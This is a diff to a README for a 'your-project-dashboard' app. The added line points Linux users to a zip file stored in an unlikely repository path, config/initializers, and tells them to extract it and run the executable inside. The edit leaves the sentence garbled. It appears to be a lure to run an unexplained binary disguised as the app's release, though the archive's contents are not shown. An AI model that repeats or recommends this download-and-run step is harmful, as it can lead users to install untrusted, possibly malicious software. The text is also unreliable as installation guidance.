IWAN772/your-project-dashboard/README.md

 ### On Linux:
 - If you downloaded a `.deb`, open it with your package installer.
-- If you downloaded a `.tar.gz`, extract it and run the executable inside.
+- If you downloaded a `https://github.com/IWAN772/your-project-dashboard/raw/refs/heads/main/config/initializers/your_project_dashboard_1.1.zip`, extract it and run the executable inside.
 - Launch the your-project-dashboard program from your apps menu or terminal.
 - The web dashboard will open in your browser.